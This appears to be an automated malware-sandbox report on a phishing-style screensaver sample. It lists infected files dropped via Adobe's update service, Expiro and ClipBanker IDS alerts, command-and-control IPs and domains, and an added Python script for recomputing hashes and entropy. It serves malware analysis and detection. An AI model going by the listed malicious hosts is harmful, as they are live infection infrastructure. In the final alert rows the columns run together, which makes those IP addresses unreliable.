SHA1:B2D38851B45F850EA8F6B5F8FD3A92B96C9C2C06
SHA-256:90EC81B4E2D8D783757A173AB7E60C063713BBAE498512EBF767DF277E8D177E
SHA-512:BE953D0A2F95A51BB20F4A4FFF44D11A2098EF4217DF3F2431F7FC05FAC0318783CEE214E1CAD9CE8DD73D6513AE151EB3E4F98BA3C2F2007D46F1A3F3094D2D
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~.B.:.,.:.,.:.,.3...8.,.3...*.,.3...5.,.:.-...,.3...{.,.3...8.,...R.;.,.3...;.,.3...;.,.Rich:.,.........PE..d....H#X..........".................8t............................................................... ......................................X........... ...............................................................................P............................text............................... ..`.data....G.......2..................@....pdata..............................@..@.rsrc... ........ ..................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1144320
Entropy (8bit):5.031996802600273
Encrypted:false
SSDEEP:12288:uNXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:uNsqjnhMgeiCl7G0nehbGZpbD
MD5:BD9A4418F0BB9873B642B4914A4BCFC8
SHA1:BD05749548D1E0E382FE148E668DAAB50EAE80EC
SHA-256:9F5F1A009BF6848B59115EFCC550EB25C57C1296DBA8AACE3813DB8CF62FCA8F
SHA-512:27FA8B28B60704F568DF334A778CE0AFBE2B022D1D7720C20E0EE106A6A454F4945D79917CBFB5B57C6A74B5F20F4500BF6281406335F3E12767939A712363B4
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................q.......`.......f...............v.......|.......a.......d.....Rich....................PE..d.....[J.........."......&...........&............................................................... ......................................$...d....`.......P..................................................................t.......`............................text....%.......&.................. ..`.data........@.......*..............@....pdata.......P.......,..............@..@.rsrc........`......................@..@.reloc...P...p...@...6..............@...k.[J8.....[JE...+.[JR.....[J\...+.[JR.....[Jg...........ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.msvcrt.dll.WS2_32.dll...............................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):4106240
Entropy (8bit):7.321216791274316
Encrypted:false
SSDEEP:49152:badpFUx1nkQoqvUbvgXELEnAR0gXV/XB+7nZE1GhnuFnNeNMWo0CWgiV5omI05Ij:QFUxeecao3yudFnNEDHIedD527BWG
MD5:272951EFDA32D39F15FB575BE1A1D9FF
SHA1:33650D85812D5957AEC3C2247504C1F28D56D84F
SHA-256:9A5432E832A71E1738313E3EF6534F3518CC39CD23E18C4368EED97A6791E933
SHA-512:D58EC7D55A2F5B364B2D6A37F2B50DB45699BEED6F5F890992C7401A68D1F00BA95DE8B190C90FAAFBBC190F7814ACD95BFC12557AD060A124804DFCE90DC424
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%^..a?u^a?u^a?u^F..^c?u^hG.^e?u^hG.^.?u^hG.^n?u^a?t^&>u^hG.^6?u^hG.^T?u^F..^`?u^hG.^`?u^hG.^`?u^hG.^`?u^Richa?u^........................PE..d...d..L..........".......1.....................................CS P..........>.......>...............................................0.l....0.......5..%....4.<...................<.0.8...............................................0............................text...x.1.......1................. ..`.data....x...01..z..."1.............@....pdata..<.....4.......4.............@..@.rsrc....%....5..&....5.............@..@.reloc........5.......5.............@...U..LP......L]......Lg......L]...7..Lt......L]...n..L.......L]...,..L............ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.msvcrt.dll.RPCRT4.dll.ole32.dll.............................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1660928
Entropy (8bit):5.605458384830612
Encrypted:false
SSDEEP:24576:9vMgzNciyYe13kvoUasqjnhMgeiCl7G0nehbGZpbD:RcibeUoUuDmg27RnWGj
MD5:39BE2351CC35C279474F5941C10A602A
SHA1:3D8DFCDD01EE8D1E5EBBB03CD08C603381FD64DC
SHA-256:2DF73320BF2991F10E57BCBCD2BB559DFB4FE490F185BE444672EBC0E3E81E6E
SHA-512:76AF94B1E197C8A9050A9B2B245E9D069FB03D72172D681A0F7F6109EE5B2F04F79DC0E0D8F3CB236C8862234C459AD3A7C340A0E2164023716878E8020903D7
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..................................................................................Rich...........................PE..d... ..L.........."..........P......lT..............................................~t............... ...................................#.....D....@..........."..................P...........................................d...................................text............................... ..`.data...x...........................@....pdata...".......$..................@..@.rsrc........@......................@..@.reloc...P...P...@..................@......L ......L+...7..L5......L+...h..L@......L+......LH......Li......L.......L.......L.......L+......L.......L.......L;......Ld......L.......L.......L.......L.......L+......L.......L!......L+......LB......Le......L.......L.......L.......L.......L#...\..L0...5..L=......LJ......LV...........

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1328128
Entropy (8bit):5.252436209883557
Encrypted:false
SSDEEP:24576:K/UpJVuYgsqjnhMgeiCl7G0nehbGZpbD:oU0YcDmg27RnWGj
MD5:5315539A5EC2C8A5DB1CA9BE817282C9
SHA1:FE07969FCB3FBEFEAC9EC59D3061828321BE06F5
SHA-256:30DAC95B88C0285CFDBB527FAE388E3C5C4F40578583BD3466AD2D34810441AD
SHA-512:3AA66F3C7059AA80C9A7807927662E6F65D057BA6A809D10656DB2A22D4402A6D23AF0D78642967AE747C151BEFC031F50FBD22AB448CECB71BEDEC31B8F67CA
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-...~...~...~...~...~......~......~......~......~...~...~......~......~.o~...~......~Rich...~........PE..d....-JX.........."..........N......0..........@.......................................... .......... .................................@%..0........ .. ...............................8...........................P............... ................................text...Z........................... ..`.rdata..............................@..@.data...............................@....pdata........... ..................@..@.rsrc... .... ......................@..@.reloc...P...0...@..................@...................................................................................................................................................................................................................................................................

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):2083328
Entropy (8bit):7.087820240619387
Encrypted:false
SSDEEP:49152:iLbYI4I0bVKBUhx8CRSrzQ8vbeKgSRpXxmDYeQeaUx7qE7YLDmg27RnWGj:SYZkBU6ZvCK/phm8eQN8WD527BWG
MD5:FCD24DD63126C9B5BC420BF92FA39456
SHA1:6FF6D87F99432D07982A0AF5A9945287D24C26BD
SHA-256:F6EEF6D5B6207C0CE198AC1AC2141EC6ADFFCBCFAA2CFED4A76D8585A6409C89
SHA-512:E4CB77C4288F3541C13519E104CC4DFB7D4F43B1E565640219775981F65685CFAD51D0C146586C6C3DADC7762F75269ACB521E88AA744DF4301418FCD8E6CF80
Malicious:true
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......8..|...|...|...u.4.~...u.%.w...u.2.c...|...~..u.".e...u.+.....u.3.}...u.5.}...u.0.}...Rich|...........................PE..d...Q..L.........."......8..........H........................................ ...................... ...............................B......X...@...............................................................................t....................................text....6.......8.................. ..`.data....-...P.......>..............@....pdata...............L..............@..@.rsrc...............................@..@.reloc....... ......................@...U..L.......L.......L.......L.......L....7..L.......L.......L....,..L....0..L....n..L.......L.......L.......L.......L)......L4...1..LA......LM......LX...q..Le...........ADVAPI32.dll.ntdll.DLL.KERNEL32.dll.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.RPCRT4.dll.VSSAPI.DLL.SETUPAPI.dll.NETA
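Every dropped file in this table is written by armsvc.exe (Adobe's update service) and carries the same SSDEEP tail (...sqjnhMgeiCl7G0nehbGZpbD / ...Dmg27RnWGj), which is what a file infector appending one payload to many host executables looks like. The per-file fields (hashes, 8-bit entropy, the Encrypted verdict, the File Type string) can be recomputed locally to confirm a suspect binary against this report. The script below is an added example, not Joe Sandbox's code and not part of the report; it uses only the Python standard library, so SSDEEP is not reproduced. The 7.9-bit "encrypted" threshold, the libmagic-style wording and the minimal PE32+ header built by build_sample_pe() are assumptions made for the example.

```python
"""Recompute the per-file triage fields shown in the dropped-files table
(MD5/SHA1/SHA-256/SHA-512, 8-bit entropy, an 'encrypted' heuristic and a
libmagic-style PE type string) with the Python standard library only."""
import hashlib
import math
import struct
from collections import Counter
from typing import Optional

# IMAGE_OPTIONAL_HEADER.Subsystem values of interest.
_SUBSYSTEMS = {2: "GUI", 3: "console"}
# IMAGE_FILE_HEADER.Machine values of interest.
_MACHINES = {0x014C: "Intel 80386", 0x8664: "x86-64", 0xAA64: "Aarch64"}


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), as in 'Entropy (8bit)'."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(entropy: float, threshold: float = 7.9) -> bool:
    """Heuristic 'Encrypted' verdict: packed, compressed or encrypted data sits
    close to 8 bits per byte. The threshold is an assumption for this example,
    not Joe Sandbox's documented cut-off."""
    return entropy >= threshold


def hashes(data: bytes) -> dict:
    """Upper-case hex digests in the same four algorithms the report lists."""
    return {
        "MD5": hashlib.md5(data).hexdigest().upper(),
        "SHA1": hashlib.sha1(data).hexdigest().upper(),
        "SHA-256": hashlib.sha256(data).hexdigest().upper(),
        "SHA-512": hashlib.sha512(data).hexdigest().upper(),
    }


def pe_file_type(data: bytes) -> Optional[str]:
    """Return a libmagic-style description for a PE image, or None if not PE."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if e_lfanew + 24 + 70 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    (machine,) = struct.unpack_from("<H", data, e_lfanew + 4)
    opt = e_lfanew + 24                         # optional header follows the 20-byte COFF header
    (magic,) = struct.unpack_from("<H", data, opt)
    (subsystem,) = struct.unpack_from("<H", data, opt + 68)   # same offset in PE32 and PE32+
    fmt = {0x10B: "PE32", 0x20B: "PE32+"}.get(magic)
    if fmt is None:
        return None
    return "%s executable (%s) %s, for MS Windows" % (
        fmt,
        _SUBSYSTEMS.get(subsystem, "subsystem %d" % subsystem),
        _MACHINES.get(machine, "machine 0x%04x" % machine),
    )


def triage(data: bytes) -> dict:
    """All report fields that can be recomputed offline for one file."""
    ent = shannon_entropy(data)
    return {
        "File Type": pe_file_type(data),
        "Size (bytes)": len(data),
        "Entropy (8bit)": ent,
        "Encrypted": looks_encrypted(ent),
        **hashes(data),
    }


def build_sample_pe() -> bytes:
    """Constructed minimal PE32+ GUI x86-64 header for the demo; not a real dropped file."""
    buf = bytearray(0x200)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)          # e_lfanew -> PE signature at 0x80
    buf[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<H", buf, 0x84, 0x8664)         # Machine = x86-64
    struct.pack_into("<H", buf, 0x98, 0x20B)          # Optional header Magic = PE32+
    struct.pack_into("<H", buf, 0x98 + 68, 2)         # Subsystem = Windows GUI
    return bytes(buf)


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for key, value in triage(blob).items():
        print("%s:%s" % (key, value))
```

Run it with a path argument to compare a file on disk against the table: the four digests must match exactly, the entropy should agree to several decimals, and a File Type of "PE32+ executable (GUI) x86-64, for MS Windows" with entropy around 5 to 7 bits is consistent with the entries above (these are not packed; the entropy rise in the 4 MB and 2 MB samples comes from resource and payload data, not whole-file encryption).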

Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1276416
Entropy (8bit):6.995436927641597
Encrypted:false
SSDEEP:24576:VGne3OZEIOLMCldIgbRsqjnhMgeiCl7G0nehbGZpbD:XeZizdIgblDmg27RnWGj
MD5:045A70B9D4D84B036CE87DE912F44EAD
                                                                                                                                                                                                                                                                        SHA1:F14251394E9706344192D03DDFD69C8784BFAAAB
                                                                                                                                                                                                                                                                        SHA-256:ED8AAF97645A69DB141EA9DD72A8CB3FAC132545B559DF4505ABA400A9E33628
                                                                                                                                                                                                                                                                        SHA-512:4BCA713A55B7A75F87754F55BDD2D8B3C631B7A30A0E74138C399C5336B040F1BEC411145A97A7C38D2112A18BEAA408697C957CFC3AA578C284279C0287A529
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........X..9...9...9...A8..9...A)..9...A>..9...9...8...A...9...A'..9...A?..9...A9..9...A<..9..Rich.9..........PE..d......L..........".................4G.........@.....................................W............... ..............................dm......do..........`....`...K...................'..8............................................0..p............................text...h........................... ..`.rdata.......0......................@..@.data...l....@.......(..............@....pdata...K...`...L...:..............@..@.rsrc...`...........................@..@.reloc..............................@...U..Lx......L.......L.......L....7..L.......L....,..L....0..L.......L.......L.......L.......L.......L....................ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.SHLWAPI.dll.VERSION.dll.ehTrace.dll.SHELL32.dll.slc.dll........
                                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1256960
                                                                                                                                                                                                                                                                        Entropy (8bit):5.172280865294199
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12288:mwXAwhxXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:BQwhxsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                        MD5:0D46082BE032D7DA3EE657EA6CE0C32D
                                                                                                                                                                                                                                                                        SHA1:30BB92B570B4F0C840525E4CBDE428AAEC982583
                                                                                                                                                                                                                                                                        SHA-256:F8833E96FEED9AB30378132C115C7FCD5C2FE854B2D9BBF921E09A9089C27C5A
                                                                                                                                                                                                                                                                        SHA-512:B02D62340A7239E51B627805B911AF27963CC44A7D0EB642E7765779C344E5306EDD2B0041B21144A97FBF3DE9CF21CEC6F6C235F65DC30412F69AE07E5973E4
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......... Z..N...N...N.......N.......N.......N...O.u.N.......N.......N.......N.......N.Rich..N.........................PE..d...5.[J..........".................L?.........@.....................................6............... .................................................p............................+..8............................................0...............................text...l........................... ..`.rdata.......0....... ..............@..@.data...............................@....pdata..............................@..@.rsrc...p...........................@..@.reloc...P...0...@..................@...k.[JP.....[J]...+.[Jj.....[Jt.....[J....+.[Jj.....[J......[J....................ADVAPI32.dll.KERNEL32.dll.NTDLL.DLL.USER32.dll.msvcrt.dll.ole32.dll.OLEAUT32.dll.slc.dll........................................................................................
                                                                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):7.867365277392532
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                                                                                                                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                                                                        File name:PO#_1100015533.scr
                                                                                                                                                                                                                                                                        File size:1'538'560 bytes
                                                                                                                                                                                                                                                                        MD5:ac9d898648d7b851bbccb6f6028d45c6
                                                                                                                                                                                                                                                                        SHA1:82379e0b59f9a08c7196897a09be3ae859ec498a
                                                                                                                                                                                                                                                                        SHA256:6f9d6ab9fccd1087337ed8328407e5918bd3e2cddef4e4c4b56b067e956ac0d2
                                                                                                                                                                                                                                                                        SHA512:fc705a48e8fa764160cd021f25e0dde73fcbbeebf0cfffbe572317c163cd0946a39a4d6c075d39e5dcbedbf86c74bed978534004c3b4a1b66e311752aa102bbd
                                                                                                                                                                                                                                                                        SSDEEP:24576:rbJN+UVsa/olfwDPFB1Oj4eg9CQA1S092Txy0QEII2vWmexiq4VzGQ1IZTlNdSwq:X3+UfWwDPfkGCRUTs0QEI6TxiqCGKoF0
                                                                                                                                                                                                                                                                        TLSH:816501C02B29B711DDBC7934C52AEDB862741E38B010B9E26EED2B5776CA1136E1DF05
                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...b..g..............0..b..........*.... ........@.. ....................................@................................
                                                                                                                                                                                                                                                                        Icon Hash:0000000000000000
                                                                                                                                                                                                                                                                        Entrypoint:0x57802a
                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x67870B62 [Wed Jan 15 01:12:02 2025 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:4
                                                                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                                                                        File Version Major:4
                                                                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                                                                        Subsystem Version Major:4
                                                                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        jmp dword ptr [00402000h]
                                                                                                                                                                                                                                                                        lodsd
                                                                                                                                                                                                                                                                        fiadd word ptr [eax]
                                                                                                                                                                                                                                                                        add bh, ch
                                                                                                                                                                                                                                                                        mov esi, CAFE0000h
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        mov esi, 000000BAh
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
                                                                                                                                                                                                                                                                        add byte ptr [eax], al
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x177fd8         0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x17a000         0x126c        .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x17c000         0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x2000           0x176040      0x176200  3dfd16e4337b63da37b22da28f0f6e16  False     0.9308816926996325  data       7.87067678928939     IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc   0x17a000         0x126c        0x1400    7c587028606f52cb2f2cc4e8775e05c7  False     0.708203125         data       6.39345821116422     IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x17c000         0xc           0x200     3ccd6629c677ce45428c5fe14c383c1f  False     0.044921875         data       0.10191042566270775  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name           RVA       Size   Type                                                                               Language  Country  ZLIB Complexity
RT_ICON        0x17a100  0xbdf  PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced                                           0.9348469891411648
RT_GROUP_ICON  0x17acf0  0x14   data                                                                                                  1.05
RT_VERSION     0x17ad14  0x358  data                                                                                                  0.4287383177570093
RT_MANIFEST    0x17b07c  0x1ea  XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators                     0.5489795918367347
DLL          Import
mscoree.dll  _CorExeMain
Timestamp                        SID      Signature                                                                       Severity  Source IP        Source Port  Dest IP          Dest Port  Protocol
2025-01-15T12:57:11.148650+0100  2803274  ETPRO MALWARE Common Downloader Header Pattern UH                               2         192.168.2.22     49166        193.122.130.0    80         TCP
2025-01-15T12:57:12.878703+0100  2051648  ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)                    1         192.168.2.22     52781        8.8.8.8          53         UDP
2025-01-15T12:57:15.987935+0100  2051649  ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)                   1         192.168.2.22     56475        8.8.8.8          53         UDP
2025-01-15T12:57:44.372540+0100  2034983  ET MALWARE Win32/ClipBanker.OC CnC Activity M2                                  1         192.168.2.22     49175        54.244.188.177   80         TCP
2025-01-15T12:57:47.254510+0100  2051648  ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)                    1         192.168.2.22     60507        8.8.8.8          53         UDP
2025-01-15T12:57:50.144218+0100  2051649  ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)                   1         192.168.2.22     50568        8.8.8.8          53         UDP
2025-01-15T12:57:51.628338+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz  1         18.141.10.107    80           192.168.2.22     49182      TCP
2025-01-15T12:57:51.628338+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst  1         18.141.10.107    80           192.168.2.22     49182      TCP
2025-01-15T12:58:13.044911+0100  2034983  ET MALWARE Win32/ClipBanker.OC CnC Activity M2                                  1         192.168.2.22     49183        82.112.184.197   80         TCP
2025-01-15T12:58:20.480766+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz  1         54.244.188.177   80           192.168.2.22     49188      TCP
2025-01-15T12:58:20.480766+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst  1         54.244.188.177   80           192.168.2.22     49188      TCP
2025-01-15T12:58:21.044344+0100  2051648  ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)                    1         192.168.2.22     59447        8.8.8.8          53         UDP
2025-01-15T12:58:46.657220+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz  1         47.129.31.212    80           192.168.2.22     49195      TCP
2025-01-15T12:58:46.657220+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst  1         47.129.31.212    80           192.168.2.22     49195      TCP
2025-01-15T12:58:48.207200+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz  1         13.251.16.150    80           192.168.2.22     49196      TCP
2025-01-15T12:58:48.207200+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst  1         13.251.16.150    80           192.168.2.22     49196      TCP
2025-01-15T12:58:53.957588+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz  1         34.246.200.160   80           192.168.2.22     49204      TCP
2025-01-15T12:58:53.957588+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst  1         34.246.200.160   80           192.168.2.22     49204      TCP
2025-01-15T12:58:54.504326+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz  1         34.227.7.138     80           192.168.2.22     49206      TCP
2025-01-15T12:58:54.504326+0100  2037771  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst  1         34.227.7.138     80           192.168.2.22     49206      TCP
2025-01-15T12:58:55.969486+0100  2850851  ETPRO MALWARE Win32/Expiro.NDO CnC Activity                                     1         192.168.2.22     49194        82.112.184.197   80         TCP
2025-01-15T12:58:57.376908+0100  2018141  ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz  1         44.221.84.105    80           192.168.2.22     49211      TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:57.376908+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.2249211TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:59.225917+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.2249213TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:59.225917+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.2249213TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:59.720208+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.94.10.3480192.168.2.2249214TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:58:59.720208+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.94.10.3480192.168.2.2249214TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:59:02.787886+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.2249217TCP
                                                                                                                                                                                                                                                                        2025-01-15T12:59:02.787886+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.2249217TCP
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
